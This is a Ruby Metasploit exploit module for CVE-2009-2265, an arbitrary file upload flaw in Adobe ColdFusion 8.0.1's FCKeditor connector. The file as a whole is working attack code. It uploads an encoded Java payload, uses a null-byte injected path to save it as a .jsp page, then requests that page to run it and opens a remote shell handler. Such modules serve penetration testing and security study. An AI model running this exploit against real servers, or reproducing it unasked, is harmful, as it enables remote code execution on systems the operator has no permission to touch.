##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ColdFusion 8.0.1 Arbitrary File Upload and Execute',
      'Description'    => %q{
          This module exploits the Adobe ColdFusion 8.0.1 FCKeditor 'CurrentFolder' File Upload
        and Execute vulnerability.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'Platform'       => 'win',
      'Privileged'     => true,
      'References'     =>
        [
          [ 'CVE', '2009-2265' ],
          [ 'OSVDB', '55684'],
        ],
      'Targets'        =>
        [
          [ 'Universal Windows Target',
            {
              'Arch'     => ARCH_JAVA,
              'Payload'  =>
                {
                  'DisableNops' => true,
                },
            }
          ],
        ],
      'DefaultOptions' =>
        {
          'SHELL' => 'cmd.exe'
        },
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jul 3 2009'
    ))

    register_options(
      [
        OptString.new('FCKEDITOR_DIR', [ false, 'The path to upload.cfm ', '/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm' ]),
      ])
  end

  def exploit

    page  = rand_text_alpha_upper(rand(10) + 1) + ".jsp"

    dbl = Rex::MIME::Message.new
    dbl.add_part(payload.encoded, "application/x-java-archive", nil, "form-data; name=\"newfile\"; filename=\"#{rand_text_alpha_upper(8)}.txt\"")
    file = dbl.to_s
    file.strip!

    print_status("Sending our POST request...")

    res = send_request_cgi(
      {
        'uri'		=> normalize_uri(datastore['FCKEDITOR_DIR']),
        'query'		=> "Command=FileUpload&Type=File&CurrentFolder=/#{page}%00",
        'version'	=> '1.1',
        'method'	=> 'POST',
        'ctype'		=> 'multipart/form-data; boundary=' + dbl.bound,
        'data'		=> file,
      }, 5)

    if ( res and res.code == 200 and res.body =~ /OnUploadCompleted/ )
      print_status("Upload succeeded! Executing payload...")

      send_request_raw(
        {
          # default path in Adobe ColdFusion 8.0.1.
          'uri'		=> '/userfiles/file/' + page,
          'method'	=> 'GET',
        }, 5)

      handler
    else
      print_error("Upload Failed...")
      return
    end

  end
end
